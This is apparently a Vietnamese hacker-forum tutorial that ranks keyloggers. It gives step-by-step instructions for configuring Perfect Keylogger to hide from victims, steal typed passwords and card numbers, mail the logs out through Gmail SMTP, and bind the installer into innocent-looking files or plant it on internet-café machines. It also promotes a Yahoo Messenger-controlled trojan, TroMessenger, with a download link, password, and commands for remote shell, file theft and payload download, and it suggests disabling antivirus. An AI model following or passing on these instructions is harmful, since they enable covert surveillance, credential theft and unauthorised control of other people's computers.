THẾ GIỚI KEYLOG RẤT ĐA DẠNG, NHƯNG DƯỚI ĐÂY LÀ MỘT TRONG NHỮNG CON KEYLOG XẾP VÀO LOẠI NGUY HIỂM BẬC NHẤT ĐƯỢC NHIỀU CÁC HACKER SỬ DỤNG NHẤT HIỆN NAY

1)_ Perfect Keylogger V 1.62 con này cool đúng như tên gọi của nó, ngoài ra còn có khả năng ghi bàn phím ảo theo kiểu chụp click chuột chức năng tốt, dùng rất tốt ghi tấn tập chung tấn công 1 mục tiêu xác định, nhưng phân tích đựoc một cái pass click bằng chuột thì hơi oải.(ko qua được tường lửa)

2)_ SC-Keylogger Pro V3.2 về chức năng thì con này tuyệnt nhất, log cũng dễ đọc nhưng mỗi tội hay lỗi khi cài đặt, tỉ lệ thành công là 40% (tùy theo cấu hình của máy v vv......) (ko qua được tường lửa)

3)_ Backlogger 2.0

4)_ 007 Spy Software con này ghi tốt, gửi mail rất ổn định nhưng log của nó hơi khó đọc, ẩn tốt, có khả năng remote intalls nhưng mình chưa thử bao giờ

5)_Ardamax 2.42 con này cũng ghi bàn phím ảo rất tốt, log dễ phân tích, ẩn rất tốt, có khả năng gỡ bỏ anti khi đã cài đặt thành công

6)_Win-spy 8.8 pro còn này cũng very cool, ẩn tốt, gỡ bỏ anti và vô hiệu hóa tường lửa(rất cool)

BẮT TAY VÀO VẤN ĐỀ CHÍNH NÀOOOOO....!!!!!!!

1) PERFECT KEYLOGER V1.62

Trong các loại Keylogger thì PERFECT KEYLOGGER 1.62 là loại thông dụng nhất . Phương pháp cài đặt của nó có phần phức tạp ; nhưng bạn nào đã cài đặt thành công nó thì hầu như các loại p/m keylogger khác đều tương tự và cài đặt dễ dàng .

Giới thiệu với các bạn Percfect Keylogger V1.62 là 1 trong 10 con keyloger nguy hiểm nhất ;( Xếp hạng thứ tư là Perfect Keylogger - "gián điệp" này có khả năng ghi lại các ký tự nhập từ bàn phím, các mật khẩu, số thẻ tín dụng.) Các file log của nó gửi về Email cho chủ nhân rất dễ phân tích và truy cứu số liệu . Nếu download được phiên bản mới nhất và cài đặt đúng phương pháp thì nó có thể lấy được pass của các cách sử dụng qua "bàn phìm ảo".

Đặc điểm của Perfect Keylogger 1.62 là nó tạo ra được file Remote Install với dung lượng nhỏ (khoảng 200kb) Chúng ta có thể cho file này ẩn nấp (nhúng vào , *****g ghép ) dưới rất nhiều dạng File để dụ Victim vào bẩy.(exe ; Image ; Mp3 ; Steath Icon ) .Cách dùng Perfect Keylogger này rất hiệu quả và thông dụng . Tuy nhiên vì tính chất " nguy hiểm và bén nhạy" của nó mà hiện nay nó bị hầu hết các loại AntiVirus có tiếng tăm loại trừ hẳn . tuy nhiên với các bác chơi keylog nhà ta bây giờ mà muốn setup ngoài quán nét thì kiểu gì cũng phải phá bỏ cái deepfreezer. thế nên theo mình con này dùng là tuyệt vời nhất. Cách cài đặt và sử dụng sẽ được giới thiệu sau đây :

sau khi run file exe ta sẽ thấy một màn hình sau đây

Chọn next để tiếp tục

Sau đó là màn hình

Chọn Yes nhấn Next để tiếp tục :

Keyword : Cac ban chon mot cai ten sao cho Victim khi tim ra phai lung tung lua chon de DEL ; thi du : YahooWXC hay WinLogon hay NortonFind ; hay OfficeXP v.v... ; noi chung la tuy y .

Cac ban change dia chi de setup vao (rat quan trong de an ***) theo toi chon :

C:\Program Files\Yahoo!\Messenger hay :

C:\WINDOWS\system hay

C:\Program Files\Common Files\Microsoft Shared\DAO

Nhung dia chi nay Victim rat kho phat hien .

Ở bước này bạn chọn check box số 2 là : Stealth Installation .(để không có bảng báo cáo trong "add remove program"

Phần còn lại bam next tiếp tục .

Cac thao tac ke tiep de setup cac ban biet roi , cuoi cung la dien Usename vas pass cua chuong trinh vao bang Registration

Sau đây là cách để bạn thao tác với control panel :

Bạn chú ý hình này ở phía cuối góc phải màn hình

Click chuột phải chọn Options.

vào màn hình đâu tiên Seting lại các dữ liệu như:

Sho/hide program Icon : Chon phim tat de goi chuong trinh ra

Ví dụ : Ctrl + Alt + L .hoặc v..v...(Bạn phải nhớ phím tắt này nếu không thì không gọi nó ra được để tạo file Remote Install)

Chọn check box Run on windows startup để pbk khởi động khi win chạy

Chọn check box Don't show program icon at startup để ẩn cái icon của chưong trình trong danh muc những chương trình khởi động

Show / hide program icon :Chọn phím tắt để làm ẩn hay hiện ra chương trình ,cái icon ở khay icon sẽ hiện ra hay ẩn đi khi nhấn tổ hợp phím, Bạn nên đặt một phím tắt bí mật của riêng bạn.

Hide program from Ctrl+Alt+Del :Bạn hãy đánh dấu vào ô này để ẩn tên chương trình hiện ra trong Task Manager (nên chọn)

mấy cái còn lại bạn chọn cũng được, kô cũng đựoc

Tiếp tục :

Set Password : dien pass de mo chuong trinh

Khong chon : Monitor only..........

Chọn hết tất cả các check box tại log này

Khong nen chon Capture man hinh (Bo tat ca cac dau kiem)

File hình ảnh chỉ làm Mail gửi về có dung lượng cao . Nhưng đối với các bàn phím ảo thì nó rất hiệu quả khi ta chỉ cần đánh Victim trong vài ngày là rút lui bí mật .

chọn thời gian mỗi lần keylog ghi nhận rồi send back lại cho bạn log : ví dụ mình chọn send về 1 mail sau mỗi 30 phut

Chon send log only ............ thi du : 100 kb .

Nhấn qua Deliever để điền mail .

bạn điền email bạn vào

Đây là phần cài đặt các thông số để con Keylogger tự động gửi Email về cho chủ nhân nó . Rất nhiều bạn đã lúng túng không biết lấy các thông số này từ đâu và thường bị thất bại tại bước này . Các bạn chú ý từng thao tác nhé :

Tại bảng này bấm vào "Email" bên trái bảng >

bấm vào Delivery Bảng mới này hiện ra >

Send to : Điền địa chỉ Email bạn muốn nó gửi về

Username và password :điền của địa chỉ email đã điiền trên .(Nên dùng Mail gửi và nhận cùng 1 địa chỉ )

SMTP : phần này rất quan trọng (rất nhiều người thắc mắc)

ở đây tôi nêu cho các bạn gmail (Nên chọn GMAIL để gửi và nhận thư ) và tuyệt đối ko chọn yahoomail hay hostmail (ko hỗ trợ 2 loại này)

GMAIL :

gsmtp183.google.com

gsmtp163.google.com

gmail-smtp-l.google.com

alt2.gmail-smtp-in.l.google.com

alt1.gmail-smtp-in.l.google.com

=>=> bọn gmail này đảm bảo dùng rất cool , Ít khi bị kẹt Mail trên Server .

Chọn một trong những địa chỉ SMTP này để đièn vào ô tương xứng . Điều quan trọng ở đây là Gmail chỉ gửi cho Gmail và yahoo mail chỉ gửi được cho yahoo mail.

Authentication : chọn NON

Bấm vào Send test để thử .Nếu thành công các bạn sẽ được thông báo như sau :

Về việc chọn option trên FTP thì mình chưa dùng bao giờ, theo mình nên gửi log theo mail là cool nhất(tránh trường hợp host die)

Tiếp theo : Tạo file Remote Install

TẠO FILE REMOTE INSTALL

(Chỉ trong vòng 10 giây con Keylogger đã được setup vào máy hoặc Victim chỉ cần kích vào là ta đã thành công)

Tại phía dưới bên phải màn hình > kích phải vào biểu tượng hình cuộn phim > chọn Remote Installation

Bấm NEXT để tiếp tục chọn đúng như trong ảnh)

Bấm NEXT để tiếp tục :

Bấm vào : BROWSE để chỉ file dẫn cho con keylogger nhúng vào . Có thể chọn file EXE hay file nhạc v.v..

Bấm NEXT > NEXT > Finish .

File mới được tạo ra có tên đầu là : inst+tên gốc của file dẫn , Ta có thể đổi tên file này lại tùy ý .

Dùng file này để gửi đến Victim hay mang ra hàng NET kíck đôi vào nó là ta đã cài đặt xong vào máy Victim >> Khi cài đặt thành công trong Email của các bạn se có 1 mail gửi đến báo thành công như sau :

Download :Tromessenger 1.2

Pass : www.p30download.com

Xâm nhập máy tính từ xa thông qua Yahoo! Messenger ( 19/10/2006 )

Đây là một chương trình xâm nhập và kiểm soát máy tính từ xa thông qua Yahoo! Messenger. Với công cụ này, bạn có thể kiểm soát bất cứ một máy tính nào bằng cách gửi thông tin qua Yahoo! Messenger ảo thiết lập trong hệ thống.

Cơ chế hoạt động:

Sau đây là quy trình hoạt động của chương trình sau khi xâm nhập:

1) Chạy vào chương trình khởi động (Startup).

2) Kiểm soát bộ nhớ hệ thống.

3) Nằm ẩn chờ khi có kết nối vào mạng.

4) Khi máy đối tượng đã kết nối, phát tín hiệu trở về cho máy ID ảo.

5) Gửi thông tin về cho chủ nhân, sau khi quá trình phát tín hiệu thành công.

6) Và bây giờ bạn đã có thể kiểm soát mọi thứ trên máy nạn nhân.

Cấu hình tối thiểu:

1) Hệ điều hành Microsoft Windows XP hoặc Windows Server 2003 . Chương trình không hỗ trợ trên Windows 2000, Windows 98 đến thấp hơn, và hệ thống Linux.

2) 128MB RAM (256MB RAM cấu hình chuẩn)

3) 700Mhz CPU.

4) 8MB Card đồ họa.

5) Dung lượng trống đủ dùng. (Để lưu hình chụp gửi về)

6) Kết nối mạng thường xuyên. Chương trình hoạt động với mọi loại mạng. Ví dụ: Dialup, ADSL, Wireless, Broadband, Satellite, LAN...

Chương trình vẫn hoạt động với điều kiện truy cập mạng bình thường. Nhưng điều kiện kết nối liên tục thường xuyên sẽ giúp quá trình phát tín hiệu và gửi thông tin tốt hơn.

Tính năng đặc biệt

Không đòi hỏi IP Address! Đây là ưu thế mạnh nhất của chương trình này. Trong những chương trình trước đây bạn buộc phải có và khai báo một IP Address trong quá trình kiểm soát. Với chương trình này thì không đòi hỏi IP Address.

Nghi vấn - Làm thế nào có thể thực hiện kiểm soát mà không cần IP Address?

Giải đáp - Bởi vì chương trình này tạo ra hẳn một Yahoo! ID ảo cho bạn, vì vậy bạn không cần phải khai báo IP Address từ máy điều khiển. Mặc dù IP Address vẫn được gửi cho bạn khi kết nối. Nhưng đó chỉ là thông tin cung cấp thêm cho bạn về máy bị kiểm soát, và không có tác dụng gì đối với chương trình TroMessenger.

Chạy ẩn trong hệ thống mạng LAN, kể cả hệ thống Router của máy chủ. Đây là một khuyết điểm của hầu hết các loại Trojan, như là Troya, chỉ hoạt động trên hệ thống có IP tĩnh. Trước đây, bạn phải có được IP Address hợp lệ. Ví dụ: nếu có một hệ thống mạng với 5 máy tính và bạn là một thành viên trong hệ thống mạng đó, bạn có thể truy cập vào các máy khác. Nhưng ai đó nằm ngoài hệ thống mạng này thì không thể truy cập vào bất cứ máy nào trong hệ thống. Bởi vì anh ta không có IP Address hợp lệ để liên kết vào hệ thống. Nhưng giờ đây, vấn đề đã được giải quyết với TroMessenger.

Với TroMessenger, bạn có thể truy cập vào bất cứ máy nào ở bất kỳ hệ thống mạng nào. Chỉ cần mọi máy tính được kết nối vào mạng và TroMessenger đang nằm ẩn bên trong.

Các kiểu lệnh

Trong phiên bản này, đây là một số câu lệnh khởi đầu cho việc kiểm soát.

/Result Kết quả của quá trình thực thi sẽ được gửi về ngay sau khi quá trình hoàn tất. Nhưng nếu như nội dung của kết quả gửi về quá dài (nhiều hơn 200 ký tự), nó sẽ được gửi lần lượt, liên tục. Bởi vì Yahoo! Messenger không cho phép nội dung có số ký tự vượt quá giới hạn đã định sẵn.

/cmd - Tương tự MS-DOS Command Prompt. Bạn có thể thực thi lệnh DOS trên máy bị kiểm soát, và nhận được kết quả. Các lệnh như: DIR , VER , VOL , IPConfig , Netstat , WHOAMI v.v ... đều có thể được sử dụng như lệnh DOS.

Ví dụ: /cmd dir C:\*.txt]

Các kiểu lệnh thực thi DOS

Bạn có thể thực thi một số lệnh DOS đặc biệt để khai thác thông tin từ phía máy bị kiểm soát.

/cmd dir - Xem danh sách các tập tin và thư mục. Bạn có thể sử dụng linh động các thông số để khai thác thông tin cụ thể nhất. Ví dụ: /cmd dir /on , /cmd dir *.txt

/cmd ipconfig - Lấy thông tin truy cập. Câu lệnh có chức năng khai thác thông tin từ thiết bị mạng đang sử dụng trên máy bị kiểm soát. Nó sẽ truy ra tên thiết bị mạng, địa chỉ IP, cổng vào, DNS Server ... v.v

/cmd tasklist - Lấy danh sách các chương trình đang hoạt động. Tương tự như Windows Task Manager. Nhưng dưới giao diện DOS.

/cmd whoami - Cung cấp thông tin để xác định máy qua mạng. Thông tin gửi về gồm : TÊN MIỀN / TÊN NHÓM MẠNG , Tên máy tính và tên truy cập máy tính sử dụng WINDOWS. Lưu ý : Câu lệnh này chỉ hoạt động với Windows Server 2003. Không hỗ trợ trên Windows XP.

/cmd netstat - Hiển thị hệ thống mạng và tất cả kết nối hiện có trên máy tính. Để đạt tốc độ nhanh, sử dụng /cmd netstat -na

Khai thác thông tin của máy tính

Chỉ việc sử dụng câu lệnh này, bạn có thể lấy được thông tin chính từ máy đối tượng.

/IP - cho biết địa chỉ IP. Một máy tính có thể có nhiều hơn một địa chỉ IP khi hoạt động. Ví dụ : bạn có một tài khoản để kết nối internet, và máy tính của bạn đang nằm trong một khu vực kết nối mạng nội bộ (LAN). Vì vậy bạn sẽ có 2 địa chỉ IP ấn định trong máy tính. TroMessenger sẽ gửi toàn bộ địa chỉ IP hiện hành trên máy tính.

/osname - cho bạn biết đầy đủ về tên của Hệ điều hành Windows và tên các phiên bản cập nhật. Ví dụ : Windows Server 2003 Service Pack 1.

/computername - cho biết tên thiết lập của máy trên hệ thống mạng. Các máy tính nhận dạng nhau qua tên này. Nếu máy tính hiện thời chưa được kết nối, không thành vấn đề, nội dung sẽ được gửi ngay sau đó.

/winusername - cho biết tài khoản quản lý sử dụng Windows. Đặc biệt trong Windows XP, có thể sẽ có nhiều tài khoản sử dụng cùng một máy. Và thông tin này sẽ được thay đổi mỗi khi người sử dụng truy cập.

Nhưng với Windows Server 2003 tên này luôn được trả về Administrator. Tuy nhiên dân Admin đã biết chuyển tên tài khoản. nhưng thông thường đa số Admin lại quên làm.

/yahooid - Cho biết tên Yahoo ID của người cuối cùng đang bị kiểm soát.

Những chức năng chính

/Help - Hiển thị các lệnh hợp lệ của TroMessenger. Sẽ có nhiều câu lệnh hơn trong những phiên bản mới. Lúc đó bạn chỉ cần sử dụng lệnh này.

/screenshot - Cho bạn ảnh chụp màn hình của máy tính đối tượng.

Nghi vấn - Yahoo! Messenger là chương trình viết bằng ngữ lệnh, làm sao TroMessenger có thể cho tôi xem ảnh chụp ?

Giải đáp - TroMessenger cho bạn ảnh ngay tức khắc. Có nghĩa là : chụp sao lại màn hình, sau đó tải lên mạng, và gửi đến bạn một liên kết để xem ảnh.

/download - Tải về một thứ gì đó và lưu lại trên máy đối tượng. Bạn sẽ được thông báo khi quá trình hoàn tất.

Câu lệnh: /download "http://www.hostname.com/folder/file.zip" "C:\SavedFile.zip"

Chú ý: Bạn phải sử dụng dấu ngoặc ("). Nếu quên, quá trình tải về sẽ không thực hiện được.

/restart - Khởi động lại máy tính.

Chú ý: Nếu bạn chạy thử nghiệm trên máy tính của bạn, bạn sẽ bị khởi động ngay lập tức mà không có tín hiệu thông báo nào. Và những chương trình trên máy sẽ bị mất. Hãy cẩn thận khi sử dụng câu lệnh này. Tương tự như Shutdown command.

/shutdown - Tắt máy tính. (Lặp lại chú ý)

/time , /date - Hiển thị ngày và giờ.

/ejectcd - Mở ổ đĩa CD-ROM.

/closecd - Đóng ổ đĩa CD-ROM sau khi mở.

/view - Hiển thị nội dung của văn bản. Lưu ý: nếu văn bản nhiều hơn ... ký tự, nó sẽ được ngắt ra thành nhiều phần để gửi liên tiếp nhau.

/getfile - tải bất kỳ tập tin nào lên mạng và gửi liên kết tải về cho bạn. Được sử dụng khi bạn muốn đọc những tập tin không phải là tập tin văn bản từ máy đối tượng

/status , /idle , /busy - Đặt tín hiệu hiển thị cho địa chỉ ảo. Như là tín hiệu Busy hoặc Idle Icons bên cạnh ID.

Câu lệnh ví dụ :

/status Toiyeuem.

/idle Dangantoi.

/busy Hiendangban.

/cancel - Đình chỉ câu lệnh đang thực hiện. Ví dụ khi bạn muốn xem một tập tin văn bản có dung lượng 1MB. Và nội dung đang được gửi đi từng phần, nhưng rồi bạn cảm thấy chán và không muốn xem nữa và muốn gửi một lệnh khác. Chỉ cần dùng lệnh /cancel là xong.

/login - Đăng nhập tài khoản sử dụng quản lý. Mỗi khi TroMessenger khởi động, nếu bạn không được xác nhận là chủ quản lý của chương trình, nhưng bạn biết mật khẩu, bạn sẽ sử dụng /login your password để bắt đầu điều khiển chương trình. Không sử dụng dấu ngoặc cho mật khẩu...

Nhưng chú ý: Đây là chương trình xâm nhập trái phép và có thể có Trojan nên khi bạn giải nén ra một số file sẽ bị Symantec và NAV kill luôn. Bạn nào muốn edit thì tắt auto protect của NAV đi (nhưng coi chừng gậy lưng đập lưng ông đó)

Sau đây là một số con trojan nổi tiếng trên thế giới